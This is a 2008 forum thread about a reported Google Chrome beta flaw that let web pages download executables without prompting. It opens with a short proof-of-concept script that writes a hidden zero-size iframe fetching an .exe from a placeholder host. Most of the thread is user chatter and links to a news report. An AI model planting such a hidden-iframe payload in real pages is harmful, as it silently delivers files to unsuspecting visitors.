White Cuban Posted September 3, 2008 Share Posted September 3, 2008 (edited) Google's new Web browser (Chrome) allows files (e.g., executables) to be automatically downloaded to the user's computer without any user prompt. Example: <script> document.write('<iframe src="http://www.example.com/hello.exe" frameborder="0" width="0" height="0">'); </script> This is just insane. this should be on the news or something, im sure that right now this exploit isnt an hour old, but still. its spreading quick enough. Careful guys Edited April 10, 2009 by Matan Mates Title edited. Please do not use all Caps. Thanks! Link to comment Share on other sites More sharing options...
Lant Posted September 3, 2008 Share Posted September 3, 2008 Bugs like that are definitely expected as it is beta, although that is a very bad one. What made me get rid of it was the sentence in the ToS saying they could publish and reproduce anything you post to the internet when using Chrome. Link to comment Share on other sites More sharing options...
EduardValencia Posted September 3, 2008 Share Posted September 3, 2008 Omg that's evry insecure :o,anyway it's useless for Google to enter the browser Market. Link to comment Share on other sites More sharing options...
White Cuban Posted September 3, 2008 Author Share Posted September 3, 2008 im looking arround, bugs are appearing everywhere. i found one i think which allows a site to connect a computer to a Zombie sleeper cell net sorta for later use in DDoS attacks, jesus christ Link to comment Share on other sites More sharing options...
Hurmoth Posted September 3, 2008 Share Posted September 3, 2008 Of course bugs are appearing everywhere, it is a BETA. This is the first release. Can't expect it to be bug free. Just be careful where you browse (which goes for any browser). Link to comment Share on other sites More sharing options...
39 Thieves Posted September 3, 2008 Share Posted September 3, 2008 im looking arround, bugs are appearing everywhere. i found one i think which allows a site to connect a computer to a Zombie sleeper cell net sorta for later use in DDoS attacks, jesus christ Uh-huh... :rolleyes: What's next, it uploads your credit card info to a cave in Afghanistan so Al Qaeda can buy Anthrax and porn? Link to comment Share on other sites More sharing options...
White Cuban Posted September 3, 2008 Author Share Posted September 3, 2008 Uh-huh... :rolleyes: What's next, it uploads your credit card info to a cave in Afghanistan so Al Qaeda can buy Anthrax and porn? ehm... no. but there is a new exploit allowing al qaeda upload anthrax through google chrome and spread it arround infidels now lol Link to comment Share on other sites More sharing options...
Harsesis Posted September 3, 2008 Share Posted September 3, 2008 Its using the old version of webkit... there is a newer version that this bug is fixed on. Its the carpet bomb bug people were going crazy about before. Link to comment Share on other sites More sharing options...
ozulus Posted September 3, 2008 Share Posted September 3, 2008 I was wondering when something like this was going to appear. Link to comment Share on other sites More sharing options...
.Kompressor Posted September 3, 2008 Share Posted September 3, 2008 it is an interesting security hole. spyware, trojans, keyloggers and zombie bots will love that bypass. Link to comment Share on other sites More sharing options...
White Cuban Posted September 3, 2008 Author Share Posted September 3, 2008 yeah, if a guy posts about google chrome a day before 20% of his reader get it. then do the vuln on his site, if its famous blog he cant harvest thousands. Link to comment Share on other sites More sharing options...
.Kompressor Posted September 3, 2008 Share Posted September 3, 2008 September 2nd, 2008 Google Chrome vulnerable to carpet-bombing flaw Posted by Ryan Naraine @ 3:05 pm http://blogs.zdnet.com/security/?p=1843 http://blogs.zdnet.com/security/?p=1843&tag=nl.e539 Link to comment Share on other sites More sharing options...
»X« Posted September 3, 2008 Share Posted September 3, 2008 Oh dear. Thanks for the heads up. Im usually very careful anyway but I shall double my efforts. Its annoying because I really love Chrome. Link to comment Share on other sites More sharing options...
White Cuban Posted September 3, 2008 Author Share Posted September 3, 2008 Why, design looks like lego xD Link to comment Share on other sites More sharing options...
mocax Posted September 3, 2008 Share Posted September 3, 2008 damn, I was about to test incognito on porn sites I'll hold off for a while, until they fix it. Link to comment Share on other sites More sharing options...
supernova_00 Posted September 3, 2008 Share Posted September 3, 2008 Why, design looks like lego xD lego, pokemon ball, window media player logo...the list goes on. By the way, there is a forum dedicated to Chrome. Here is the link http://www.chrome-forums.net/phpBB3/index.php Link to comment Share on other sites More sharing options...
39 Thieves Posted September 3, 2008 Share Posted September 3, 2008 Why, design looks like lego xD Just curious, but might your extreme excitement and opinions on this be based in any part on a vast portion of your blog pertaining to Firefox? lego, pokemon ball, window media player logo...the list goes on.By the way, there is a forum dedicated to Chrome. Here is the link http://www.chrome-forums.net/phpBB3/index.php Um...did you just create that forum? Link to comment Share on other sites More sharing options...
xinary Posted September 3, 2008 Share Posted September 3, 2008 Why, design looks like lego xD Only if you are on XP. The interface on vista is sex. Link to comment Share on other sites More sharing options...
White Cuban Posted September 3, 2008 Author Share Posted September 3, 2008 Only if you are on XP. The interface on vista is sex. like streamed sex? :o neat Link to comment Share on other sites More sharing options...
what Posted September 3, 2008 Share Posted September 3, 2008 Of course bugs are appearing everywhere, it is a BETA. This is the first release. Can't expect it to be bug free.Just be careful where you browse (which goes for any browser). Something as simple and obvious as being able to silently run .exe's should have been tested internally don't you think? Link to comment Share on other sites More sharing options...
+SOOPRcow MVC Posted September 3, 2008 MVC Share Posted September 3, 2008 Something as simple and obvious as being able to silently run .exe's should have been tested internally don't you think? It doesn't say the exe is being executed, it is just being downloaded so some user interaction is still required. Don't get me wrong though, I understand how serious of an issue it is. Link to comment Share on other sites More sharing options...
sundayx Veteran Posted September 3, 2008 Veteran Share Posted September 3, 2008 Uh-oh. Link to comment Share on other sites More sharing options...
- jigz - Posted September 3, 2008 Share Posted September 3, 2008 its BETA for a reason... you find bugs, google puts in a fix.... Link to comment Share on other sites More sharing options...
sundayx Veteran Posted September 3, 2008 Veteran Share Posted September 3, 2008 Does Chrome auto-update? Link to comment Share on other sites More sharing options...
39 Thieves Posted September 3, 2008 Share Posted September 3, 2008 Does Chrome auto-update? Says it does. Link to comment Share on other sites More sharing options...
Recommended Posts